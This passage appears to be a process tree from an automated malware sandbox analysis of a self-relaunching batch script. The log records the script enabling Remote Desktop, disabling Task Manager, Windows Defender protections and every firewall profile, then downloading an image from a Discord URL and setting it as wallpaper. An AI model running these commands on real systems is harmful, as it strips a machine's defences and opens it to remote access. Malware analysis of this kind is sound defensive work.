C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"20⤵PID:1800
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"20⤵
- Blocklisted process makes network request
PID:3208
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"20⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
PID:4168 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"21⤵PID:4840
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"22⤵PID:4572
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f22⤵PID:1916
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"22⤵PID:3540
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f22⤵PID:3088
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"22⤵PID:512
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"22⤵PID:4116
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"22⤵
- Command and Scripting Interpreter: PowerShell
PID:1552
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"22⤵PID:4980
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"22⤵PID:5096
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable22⤵PID:2340
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE22⤵
- Modifies Windows Firewall
PID:3468
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off22⤵
- Modifies Windows Firewall
PID:3056
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off22⤵
- Modifies Windows Firewall
PID:3196
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off22⤵
- Modifies Windows Firewall
PID:4224
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off22⤵PID:4976
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off22⤵
- Modifies Windows Firewall
PID:5032
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"22⤵PID:2776
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"22⤵PID:3532
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"22⤵PID:372
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"22⤵PID:4324
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"22⤵PID:1928
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"22⤵
- Command and Scripting Interpreter: PowerShell
PID:1032
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"22⤵
- Blocklisted process makes network request
PID:512
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"22⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
PID:4552 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"23⤵PID:1916
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"24⤵PID:920
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f24⤵PID:3172
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"24⤵PID:4280
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f24⤵PID:4876
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"24⤵PID:4008
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"24⤵PID:4568
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"24⤵PID:4544
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"24⤵PID:4808
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"24⤵PID:768
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable24⤵
- Modifies Windows Firewall
PID:208
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE24⤵PID:3360
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off24⤵PID:3172
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off24⤵
- Modifies Windows Firewall
PID:208
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off24⤵PID:3176
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off24⤵PID:4808
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off24⤵
- Modifies Windows Firewall
PID:2516
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"24⤵PID:920
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"24⤵PID:4484
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"24⤵
- Command and Scripting Interpreter: PowerShell
PID:4168
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"24⤵PID:3120
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"24⤵PID:3532
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"24⤵PID:2844
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"24⤵
- Blocklisted process makes network request
PID:3964
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"24⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
PID:3792 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"25⤵PID:1096
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"26⤵PID:1872
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f26⤵PID:2464
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"26⤵PID:4008
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f26⤵PID:4544
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"26⤵PID:4168
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"26⤵PID:2700
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"26⤵PID:4348
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"26⤵PID:1800
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"26⤵PID:4840
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable26⤵
- Modifies Windows Firewall
PID:1048
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE26⤵
- Modifies Windows Firewall
PID:3176
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off26⤵PID:5032
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off26⤵
- Modifies Windows Firewall
PID:1928
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off26⤵PID:3772
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off26⤵
- Modifies Windows Firewall
PID:4800
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off26⤵
- Modifies Windows Firewall
PID:4736
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"26⤵PID:5012
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"26⤵PID:3796
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"26⤵
- Command and Scripting Interpreter: PowerShell
PID:4520
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"26⤵
- Command and Scripting Interpreter: PowerShell
PID:1928
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"26⤵
- Command and Scripting Interpreter: PowerShell
PID:4332
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"26⤵
- Command and Scripting Interpreter: PowerShell
PID:4160
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"26⤵
- Blocklisted process makes network request
PID:4880
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"26⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
PID:4348 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"27⤵PID:3356
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"28⤵PID:3172
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f28⤵PID:3088
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"28⤵PID:1208
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f28⤵PID:2068
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"28⤵PID:4820
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"28⤵PID:4396
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"28⤵
- Command and Scripting Interpreter: PowerShell
PID:400
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"28⤵PID:3172
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"28⤵
- Command and Scripting Interpreter: PowerShell
PID:4160
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable28⤵PID:3120
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE28⤵PID:1048
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off28⤵PID:2136
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off28⤵
- Modifies Windows Firewall
PID:4816
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off28⤵
- Modifies Windows Firewall
PID:1084
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off28⤵
- Modifies Windows Firewall
PID:3956
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off28⤵
- Modifies Windows Firewall
PID:4824
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"28⤵PID:3248
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"28⤵PID:2776
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"28⤵PID:4876
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"28⤵
- Command and Scripting Interpreter: PowerShell
PID:4816
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"28⤵PID:2068
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"28⤵PID:1532
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"28⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
PID:4396
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"28⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
PID:3956 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"29⤵PID:1208
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"30⤵PID:3796
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f30⤵PID:1552
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"30⤵PID:3248
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f30⤵PID:2068
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"30⤵PID:3516
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"30⤵PID:728
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"30⤵PID:5016
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"30⤵PID:4824
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"30⤵
- Command and Scripting Interpreter: PowerShell
PID:3984
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable30⤵
- Modifies Windows Firewall
PID:4280
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE30⤵
- Modifies Windows Firewall
PID:3792
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off30⤵
- Modifies Windows Firewall
PID:64
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off30⤵
- Modifies Windows Firewall
PID:2136
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off30⤵PID:1048
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off30⤵
- Modifies Windows Firewall
PID:1084
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off30⤵PID:4464
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"30⤵PID:1212
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"30⤵
- Command and Scripting Interpreter: PowerShell
PID:752
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"30⤵PID:2996
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"30⤵PID:5032
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"30⤵PID:400
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"30⤵
- Command and Scripting Interpreter: PowerShell
PID:3796
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"30⤵
- Blocklisted process makes network request
PID:2776
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"30⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
PID:2012 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"31⤵PID:1096
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"32⤵PID:4800
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f32⤵PID:4008
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"32⤵PID:4356
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f32⤵PID:4224
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"32⤵PID:3484
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"32⤵PID:1328
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"32⤵PID:4332
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"32⤵PID:4520
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"32⤵PID:4048
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable32⤵
- Modifies Windows Firewall
PID:3484
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE32⤵
- Modifies Windows Firewall
PID:64
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off32⤵PID:4348
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off32⤵PID:4976
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off32⤵PID:452
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off32⤵PID:3272
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off32⤵PID:4916
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"32⤵PID:2700
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"32⤵PID:4356
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"32⤵
- Command and Scripting Interpreter: PowerShell
PID:3796
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"32⤵
- Command and Scripting Interpreter: PowerShell
PID:4396
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"32⤵
- Command and Scripting Interpreter: PowerShell
PID:3860
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"32⤵PID:3032
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"32⤵
- Blocklisted process makes network request
PID:2844
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"32⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
PID:5052 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"33⤵PID:4348
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"34⤵PID:4028
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f34⤵PID:4396
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"34⤵PID:2084
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f34⤵PID:4816
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"34⤵PID:728
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"34⤵PID:4592
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"34⤵PID:5060
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"34⤵
- Command and Scripting Interpreter: PowerShell
PID:4224
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f32⤵
- Sets desktop wallpaper using registry
PID:3484
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters32⤵PID:540
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f30⤵
- Sets desktop wallpaper using registry
PID:4312
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters30⤵PID:2080
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f28⤵
- Sets desktop wallpaper using registry
PID:3592
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters28⤵PID:3204
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f26⤵
- Sets desktop wallpaper using registry
PID:3956
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters26⤵PID:4984
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f24⤵
- Sets desktop wallpaper using registry
PID:3548
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters24⤵PID:400
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f22⤵
- Sets desktop wallpaper using registry
PID:936
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters22⤵PID:1032
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f20⤵
- Sets desktop wallpaper using registry
PID:768
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters20⤵PID:4648
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f18⤵
- Sets desktop wallpaper using registry
PID:816
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters18⤵PID:3172
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f16⤵
- Sets desktop wallpaper using registry
PID:3792
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters16⤵PID:4332
-
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f14⤵
- Sets desktop wallpaper using registry
PID:4008
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters14⤵PID:3728
-
-
-
-
